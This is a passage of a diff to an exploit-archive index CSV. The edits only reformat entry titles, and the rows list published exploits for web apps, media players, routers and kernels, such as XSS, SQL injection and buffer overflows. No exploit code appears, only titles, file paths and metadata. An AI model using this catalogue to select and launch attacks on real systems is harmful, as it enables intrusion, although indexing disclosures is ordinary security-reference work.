XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 31839,platforms/php/webapps/31839.txt,"Horde Multiple Product - week.php timestamp Parameter XSS",2008-05-24,"Ivan Sanchez",php,webapps,0 @@ -28817,13 +28817,13 @@ id,file,description,date,author,platform,type,port 31965,platforms/linux/dos/31965.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31966,platforms/linux/dos/31966.c,"Linux Kernel 2.6.9 <= 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (2)",2008-06-25,"Alexei Dobryanov",linux,dos,0 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - 'PARAMS' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0 -31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 +31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0 32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0 32048,platforms/osx/remote/32048.html,"Apple iPhone / Apple iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 (get_all_created_by_user.php id param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31971,platforms/php/webapps/31971.txt,"PHP Ticket System Beta 1 - (get_all_created_by_user.php id param) SQL Injection",2014-02-28,HauntIT,php,webapps,80 31972,platforms/windows/local/31972.py,"Gold MP4 Player 3.3 - Buffer Overflow Exploit (SEH)",2014-02-28,metacom,windows,local,0 32094,platforms/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps,0 32095,platforms/linux/dos/32095.pl,"Asterisk 1.6 IAX 'POKE' Requests Remote Denial of Service",2008-07-21,"Blake Cornell",linux,dos,0 @@ -28841,7 +28841,7 @@ id,file,description,date,author,platform,type,port 31986,platforms/php/webapps/31986.txt,"WordPress VideoWhisper 4.27.3 Plugin - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 31987,platforms/windows/remote/31987.rb,"GE Proficy CIMPLICITY gefebt.exe Remote Code Execution",2014-02-28,Metasploit,windows,remote,80 31988,platforms/windows/local/31988.rb,"Total Video Player 1.3.1 - (Settings.ini) SEH Buffer Overflow (Metasploit)",2014-02-28,Metasploit,windows,local,0 -31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 (SalesInquiry.php SortBy param) - SQL Injection",2014-02-28,HauntIT,php,webapps,80 +31989,platforms/php/webapps/31989.txt,"webERP 4.11.3 - (SalesInquiry.php SortBy param) SQL Injection",2014-02-28,HauntIT,php,webapps,80 31990,platforms/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps,0 31991,platforms/windows/local/31991.rb,"VCDGear 3.50 - (.cue) Stack Buffer Overflow Exploit",2014-02-28,Provensec,windows,local,0 31992,platforms/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps,0 @@ -28853,18 +28853,18 @@ id,file,description,date,author,platform,type,port 31998,platforms/multiple/dos/31998.txt,"S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 - Multiple Remote Vulnerabilities",2008-06-28,"Luigi Auriemma",multiple,dos,0 31999,platforms/multiple/dos/31999.txt,"IBM Tivoli Directory Server 6.1.x - Adding 'ibm-globalAdminGroup' Entry Denial of Service",2008-06-30,anonymous,multiple,dos,0 32000,platforms/linux/dos/32000.txt,"OpenLDAP 2.3.41 BER Decoding Remote Denial of Service",2008-06-30,"Cameron Hotchkies",linux,dos,0 -32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 -32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 -32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0 +32001,platforms/php/webapps/32001.txt,"RSS-aggregator 1.0 - admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 +32002,platforms/php/webapps/32002.txt,"RSS-aggregator 1.0 - admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection",2008-06-30,"CWH Underground",php,webapps,0 +32003,platforms/php/webapps/32003.txt,"RSS-aggregator 1.0 - admin/fonctions/ Direct Request Administrator Authentication Bypass",2008-06-30,"CWH Underground",php,webapps,0 32004,platforms/php/webapps/32004.txt,"FaName 1.0 - index.php Multiple Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 -32005,platforms/php/webapps/32005.txt,"FaName 1.0 page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 +32005,platforms/php/webapps/32005.txt,"FaName 1.0 - page.php name Parameter XSS",2008-06-30,"Jesper Jurcenoks",php,webapps,0 32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple DoS",2008-06-30,"Noam Rathus",multiple,dos,0 32131,platforms/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps,0 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0 32010,platforms/php/webapps/32010.txt,"Joomla! and Mambo 'com_is' 1.0.1 Component - Multiple SQL Injection",2008-07-02,"H-T Team",php,webapps,0 32011,platforms/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps,0 32012,platforms/linux/remote/32012.txt,"Netrw 125 Vim Script Multiple Command Execution Vulnerabilities",2008-07-07,"Jan Minar",linux,remote,0 -32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 +32013,platforms/php/webapps/32013.txt,"Zoph 0.7.2.1 - Unspecified SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps,0 32014,platforms/php/webapps/32014.txt,"Zoph 0.7.2.1 - search.php _off Parameter XSS",2008-07-07,"Julian Rodriguez",php,webapps,0 32015,platforms/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' Parameter SQL Injection",2008-07-07,Lovebug,php,webapps,0 32016,platforms/php/webapps/32016.pl,"fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps,0 @@ -28962,8 +28962,8 @@ id,file,description,date,author,platform,type,port 32116,platforms/php/webapps/32116.txt,"ezContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps,0 32117,platforms/php/webapps/32117.txt,"Willoughby TriO 2.1 - SQL Injection",2008-07-26,dun,php,webapps,0 32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 -32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 admin_group_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0 -32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 admin_category_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0 +32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - admin_group_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0 +32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - admin_category_details.asp mode Parameter XSS",2008-07-28,CSDT,asp,webapps,0 32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0 32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0 @@ -28998,12 +28998,12 @@ id,file,description,date,author,platform,type,port 32157,platforms/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information Disclosure",2014-03-10,"Charlie Campbell and Lyndon Mendoza",asp,webapps,80 32158,platforms/windows/local/32158.txt,"iCAM Workstation Control 4.8.0.0 - Authentication Bypass",2014-03-10,StealthHydra,windows,local,0 32161,platforms/hardware/webapps/32161.txt,"Huawei E5331 MiFi Mobile Hotspot 21.344.11.00.414 - Multiple Vulnerabilities",2014-03-10,"SEC Consult",hardware,webapps,80 -32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x (upload.php filename param) - Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - (upload.php filename param) Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32163,platforms/windows/remote/32163.rb,"SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",2014-03-10,Metasploit,windows,remote,30000 32164,platforms/windows/remote/32164.rb,"HP Data Protector - Backup Client Service Remote Code Execution",2014-03-10,Metasploit,windows,remote,5555 32165,platforms/linux/remote/32165.txt,"XAMPP Linux 1.6 - ming.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 32166,platforms/linux/remote/32166.txt,"XAMPP Linux 1.6 - iart.php text Parameter XSS",2008-08-04,"Khashayar Fereidani",linux,remote,0 -32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote,0 +32167,platforms/multiple/remote/32167.txt,"8E6 Technologies R3000 - Host Header Internet Filter Security Bypass",2008-08-05,nnposter,multiple,remote,0 32168,platforms/php/webapps/32168.txt,"Pluck 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0 32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery index.php Multiple Parameter XSS",2008-08-05,sl4xUz,php,webapps,0 @@ -29024,7 +29024,7 @@ id,file,description,date,author,platform,type,port 32185,platforms/asp/webapps/32185.txt,"KAPhotoservice search.asp filename Parameter XSS",2008-08-06,by_casper41,asp,webapps,0 32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 32187,platforms/php/webapps/32187.txt,"com_utchat component Mambo and Joomla! Component 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0 -32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 +32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 32189,platforms/multiple/remote/32189.py,"DD-WRT Site Survey SSID Script Injection",2008-08-06,"Rafael Dominguez Vega",multiple,remote,0 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0 32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' Parameter SQL Injection",2008-08-06,Lovebug,php,webapps,0 @@ -29057,7 +29057,7 @@ id,file,description,date,author,platform,type,port 32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - staff/index.php customfieldlinkid Parameter SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 32223,platforms/multiple/remote/32223.rb,"Ruby 1.9 dl Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 -32224,platforms/multiple/remote/32224.rb,"Ruby 1.9 Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 +32224,platforms/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32225,platforms/linux/remote/32225.txt,"Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",linux,remote,0 32226,platforms/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps,0 @@ -29074,11 +29074,11 @@ id,file,description,date,author,platform,type,port 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32286,platforms/linux/remote/32286.txt,"Fujitsu Web-Based Admin View 2.1.2 - Directory Traversal",2008-08-21,"Deniz Cevik",linux,remote,0 32239,platforms/php/webapps/32239.txt,"Trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 -32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0 +32248,platforms/linux/dos/32248.txt,"Yelp 2.23.1 - Invalid URI Format String",2008-08-13,"Aaron Grattafiori",linux,dos,0 32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0 32250,platforms/php/webapps/32250.py,"mUnky 0.01'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0 32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 -32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 administrator/popups/index3pop.php mosConfig_sitename Parameter XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - administrator/popups/index3pop.php mosConfig_sitename Parameter XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - mambots/editors/mostlyce/ php/connector.php Query String XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 @@ -29089,7 +29089,7 @@ id,file,description,date,author,platform,type,port 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 32261,platforms/windows/local/32261.rb,"MicroP 0.1.1.1600 - (.mppl) Local Stack Based Buffer Overflow",2014-03-14,"Necmettin COSKUN",windows,local,0 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 -32263,platforms/php/webapps/32263.txt,"Trixbox (endpoint_aastra.php mac param) - Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 +32263,platforms/php/webapps/32263.txt,"Trixbox - (endpoint_aastra.php mac param) Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - french/account_newsletters.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 includes/modules/newsdesk/newsdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29100,7 +29100,7 @@ id,file,description,date,author,platform,type,port 32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",php,webapps,0 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting",2008-08-18,"ThE dE@Th",php,webapps,0 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 -32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 (article.php) - Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 +32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 - (article.php) Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 32275,platforms/php/webapps/32275.txt,"itMedia - Multiple SQL Injection",2008-08-18,baltazar,php,webapps,0 32332,platforms/windows/dos/32332.txt,"Free Download Manager - Stack-based Buffer Overflow",2014-03-17,"Julien Ahrens",windows,dos,80 32278,platforms/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,asp,webapps,0 @@ -29142,18 +29142,18 @@ id,file,description,date,author,platform,type,port 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Auth Bypass / CSRF",2014-03-17,"TN CYB3R",php,webapps,0 32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - activities/some.php title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - companies/some.php company_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - contacts/some.php last_name Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 campaigns/some.php campaign_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 opportunities/some.php opportunity_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 cases/some.php case_title Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 -32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 +32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - files/some.php file_id Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 reports/custom/mileage.php starting Parameter XSS",2008-09-04,"Fabian Fingerle",php,webapps,0 32329,platforms/windows/dos/32329.rb,"Gold MP4 Player 3.3 - Universal SEH Exploit (Metasploit)",2014-03-17,"Revin Hadi Saputra",windows,dos,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 32333,platforms/ios/dos/32333.txt,"iOS 7 - Kernel Mode Memory Corruption",2014-03-17,"Andy Davis",ios,dos,0 32334,platforms/php/webapps/32334.txt,"Celerondude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 -32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 +32335,platforms/multiple/dos/32335.js,"Google Chrome 0.2.149 - Malformed 'view-source' HTTP Header Remote Denial of Service",2008-09-05,"Juan Pablo Lopez Yacubian",multiple,dos,0 32336,platforms/hardware/remote/32336.txt,"D-Link DIR-100 1.12 Security Bypass",2008-09-08,"Marc Ruef",hardware,remote,0 32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0 32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS - 'results_per_page' Parameter Cross-Site Scripting",2008-09-07,"David Sopas",php,webapps,0 @@ -29170,7 +29170,7 @@ id,file,description,date,author,platform,type,port 32349,platforms/php/webapps/32349.txt,"PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-08-20,"Henry Sudhof",php,webapps,0 32350,platforms/windows/dos/32350.txt,"Apple Bonjour for Windows 1.0.4 - mDNSResponder NULL Pointer Dereference Denial of Service",2008-09-09,"Mario Ballano Bárcena",windows,dos,0 32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 -32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script 'applynow.php' - SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 +32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32354,platforms/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP - 'news.php' SQL Injection",2008-09-10,r45c4l,php,webapps,0 @@ -29223,7 +29223,7 @@ id,file,description,date,author,platform,type,port 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 -32445,platforms/linux/remote/32445.txt,"MySQL 5 Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote,0 +32445,platforms/linux/remote/32445.txt,"MySQL 5 - Command Line Client HTML Special Characters HTML Injection",2008-09-30,"Thomas Henlich",linux,remote,0 32446,platforms/linux/local/32446.txt,"Xen 3.3 XenStore Domain Configuration Data Unsafe Storage",2008-09-30,"Pascal Bouchareine",linux,local,0 32447,platforms/php/webapps/32447.txt,"A4Desk Event Calendar - 'v' Parameter Remote File Inclusion",2008-09-30,Lo$er,php,webapps,0 32448,platforms/java/webapps/32448.txt,"Celoxis Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 @@ -29274,8 +29274,8 @@ id,file,description,date,author,platform,type,port 32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 - 'habari_username' Parameter Cross-Site Scripting",2008-10-16,faithlove,php,webapps,0 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 32494,platforms/php/webapps/32494.txt,"FlashChat - 'connection.php' Role Filter Security Bypass",2008-10-17,eLiSiA,php,webapps,0 -32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 -32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 - admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 +32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 - admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0 32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module - 'id' Parameter SQL Injection",2008-10-20,r45c4l,php,webapps,0 32498,platforms/asp/webapps/32498.txt,"Dizi Portali - 'diziler.asp' SQL Injection",2008-10-21,"CyberGrup Lojistik",asp,webapps,0 32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 - 'index.php' SQL Injection",2008-10-21,KnocKout,php,webapps,0 @@ -29294,7 +29294,7 @@ id,file,description,date,author,platform,type,port 32513,platforms/windows/dos/32513.py,"Haihaisoft HUPlayer 1.0.4.8 - (.m3u/.pls/.asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32514,platforms/windows/dos/32514.py,"Haihaisoft Universal Player 1.5.8 - (.m3u/.pls/.asx) Buffer Overflow (SEH)",2014-03-25,"Gabor Seljan",windows,dos,0 32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) users/update_roles Missing Authorization",2014-03-26,Metasploit,linux,remote,443 -32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 (xhr.php i param) - SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 +32516,platforms/php/webapps/32516.txt,"InterWorx Control Panel 5.0.13 build 574 - (xhr.php i param) SQL Injection",2014-03-26,"Eric Flokstra",php,webapps,80 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - ftp:// URL Multiple File Format Handling XSS",2008-10-21,"Muris Kurgas",windows,remote,0 32521,platforms/php/webapps/32521.txt,"Osprey 1.0a4.1 - 'ListRecords.php' Multiple Remote File Inclusion",2008-10-23,BoZKuRTSeRDaR,php,webapps,0 @@ -29357,7 +29357,7 @@ id,file,description,date,author,platform,type,port 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect",2014-03-29,"felipe andrian",asp,webapps,0 32581,platforms/multiple/dos/32581.txt,"Zope 2.11.2 PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 -32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 +32583,platforms/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,hardware,dos,0 32585,platforms/windows/local/32585.py,"AudioCoder 0.8.29 - Memory Corruption (SEH)",2014-03-30,sajith,windows,local,0 32586,platforms/windows/remote/32586.py,"Microsoft Active Directory LDAP Server Username Enumeration Weakness",2008-11-14,"Bernardo Damele",windows,remote,0 32587,platforms/windows/dos/32587.txt,"VeryPDF PDFView ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,windows,dos,0 @@ -29420,7 +29420,7 @@ id,file,description,date,author,platform,type,port 32644,platforms/php/webapps/32644.txt,"AlienVault 4.5.0 - Authenticated SQL Injection (Metasploit)",2014-04-01,"Brandon Perry",php,webapps,443 32645,platforms/php/webapps/32645.txt,"TWiki 4.x - SEARCH Variable Remote Command Execution",2008-12-06,"Troy Bollinge",php,webapps,0 32646,platforms/php/webapps/32646.txt,"TWiki 4.x - URLPARAM Variable Cross-Site Scripting",2008-12-06,"Marc Schoenefeld",php,webapps,0 -32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 admin/login.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 +32647,platforms/php/webapps/32647.txt,"PrestaShop 1.1 - admin/login.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32648,platforms/php/webapps/32648.txt,"PrestaShop 1.1 order.php PATH_INFO Parameter XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 